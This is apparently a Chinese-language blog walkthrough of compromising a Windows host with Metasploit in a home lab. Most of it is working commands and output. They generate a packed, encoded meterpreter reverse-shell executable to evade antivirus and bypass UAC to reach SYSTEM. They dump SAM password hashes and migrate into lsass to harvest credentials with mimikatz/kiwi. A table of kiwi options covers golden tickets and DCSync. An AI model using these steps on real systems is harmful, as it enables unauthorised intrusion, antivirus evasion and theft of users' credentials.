metasploit渗透主机总结

2022-09-23 20:17:01 浏览数 (2)

测试机:192.168.0.150

被测机:192.168.0.106

产生payload文件

代码语言:javascript复制
#msfvenom -a x86 --platform Windows -p windows/meterpreter/reverse_tcp LHOST=192.168.0.150 LPORT=4444 -e x86/shikata_ga_nai -b 'x00x0axff' -i 10 -f exe -o payload.exe
#upx payload.exe //给payload.exe加壳,防止被杀毒软件直接杀掉。
#python -m http.server 80

在Windows192.168.0.106打开浏览器,输入http://192.168.0.150,下载payload.exe文件

不要让杀毒软件阻止运行

进入

代码语言:javascript复制
#msfconsole
sf6 > use exploit/multi/handler
sf6 > set lhost 192.168.0.150
sf6 > set lport 4444
sf6 > set payload windows/meterpreter/reverse_tcp
sf6 > run

提权

代码语言:javascript复制
meterpreter > background

//放置后台后会告诉当前的session号

代码语言:javascript复制
sf6 > use exploit/windows/local/ask
msf6 exploit(windows/local/ask) > set session 1

1为前面告诉的session号

代码语言:javascript复制
msf6 exploit(windows/local/ask) > set filename payload.exe
msf6 exploit(windows/local/ask) > exploit
[*] Started reverse TCP handler on 192.168.0.150:4444 
[*] UAC is Enabled, checking level...
[*] The user will be prompted, wait for them to click 'Ok'
[*] Uploading payload.exe - 73802 bytes to the filesystem...
[*] Executing Command!
[*] Sending stage (175174 bytes) to 192.168.0.106
[*] Meterpreter session 2 opened (192.168.0.150:4444 -> 192.168.0.106:12695 ) at 2022-06-13 21:50:08  0800
meterpreter > getuid
Server username: DESKTOP-9A8VFKBxiang
meterpreter > getsystem
...got system via technique 1 (Named Pipe Impersonation (In Memory/Admin)).
meterpreter > getuid
Server username: NT AUTHORITYSYSTEM
meterpreter >

开始获取远程登录密码

代码语言:javascript复制
meterpreter > run windows/gather/credentials/windows_autologin
[*] Running against DESKTOP-9A8VFKB on session 1
[*] The Host DESKTOP-9A8VFKB is not configured to have AutoLogon password
提示这证明本机并没有配置自动登录
还可以通过导出SAM数据库中的本地用户账号(注意需要提权到SYSTEM)
提权
meterpreter > run post/windows/gather/smart_hashdump
[*] Running module against DESKTOP-9A8VFKB
[*] Hashes will be saved to the database if one is connected.
[ ] Hashes will be saved in loot in JtR password file format to:
[*] /root/.msf4/loot/20220614105643_default_192.168.0.106_windows.hashes_879156.txt
[*] Dumping password hashes...
[*] Running as SYSTEM extracting hashes from registry
[*]     Obtaining the boot key...
[*]     Calculating the hboot key using SYSKEY 4368ea4193e43ce242a9fec38c370ea2...
[*]     Obtaining the user list and keys...
[*]     Decrypting user keys...
[*]     Dumping password hints...
[*]     No users with password hints on this system
[*]     Dumping password hashes...
[ ]     Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::[ ]     DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::[ ]     WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::[ ]     xiang:1001:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::

用户名

SID

LM哈希:

NTLM哈希1:::

xiang

1000

aad3b435b51404eeaad3b435b51404ee

31d6cfe0d16ae931b73c59d7e0c089c0

使用 hashdump 获取密码(注意需要提权到SYSTEM才能使用)

终端内输入

代码语言:javascript复制
meterpreter >run hashdump

迁移kiwi到64位

代码语言:javascript复制
meterpreter > ps | grep lsass
Filtering on 'lsass'
Process List
============
 PID PPID Name   Arch Session User                                             Path
 ---  ----  ----     ----   ------- ----                                              ----
 744 652  lsass.exe x64   0    NT AUTHORITYSYSTEM       C:WindowsSystem32lsass.exe
meterpreter > migrate 744
[*] Migrating from 9704 to 744...
[*] Migration completed successfully.

使用kiwi

kiwi_cmd 模块可以让我们使用mimikatz的全部功能, mimikatz的命令直接在kiwi_cmd里直接使用

终端输入

代码语言:javascript复制
#load kiwi

直接获取密码

代码语言:javascript复制
#creds_all
meterpreter > creds_all 
[ ] Running as SYSTEM
[*] Retrieving all credentials
meterpreter > kiwi_cmd sekurlsa::logonpasswords

获得用户的

使用在线解析工具 : CMD5 https://www.cmd5.com/default.aspx?hashtype=ntlm&answer=a255emg2MjU=去解密HTML码

ID

kiwi参数

描述

1

creds_all

列举所有凭据

2

creds_kerberos

列举所有kerberos凭据

3

creds_msv

列举所有msv凭据

4

creds_ssp

列举所有ssp凭据

5

creds_tspkg

列举所有tspkg凭据

6

creds_wdigest

列举所有wdigest凭据

7

dcsync

通过DCSync检索用户账户信息

8

dcsync_ntlm

通过DCSync检索用户账户NTLM散列、SID和RID

9

golden_ticket_create

创建黄金票据

10

kerberos_ticket_list

列举kerberos票据

11

kerberos_ticket_purge

清除kerberos票据

12

kerberos_ticket_use

使用kerberos票据

13

kiwi_cmd

执行mimikatz的命令,后面接mimikatz.exe的命令

14

lsa_dump_sam

dump出lsa的SAM

15

lsa_dump_secrets

dump出lsa的密文

16

password_change

修改密码

17

wifi_list

列出当前用户的wifi配置文件

18

wifi_list_shared

列出共享wifi配置文件/编码

0 人点赞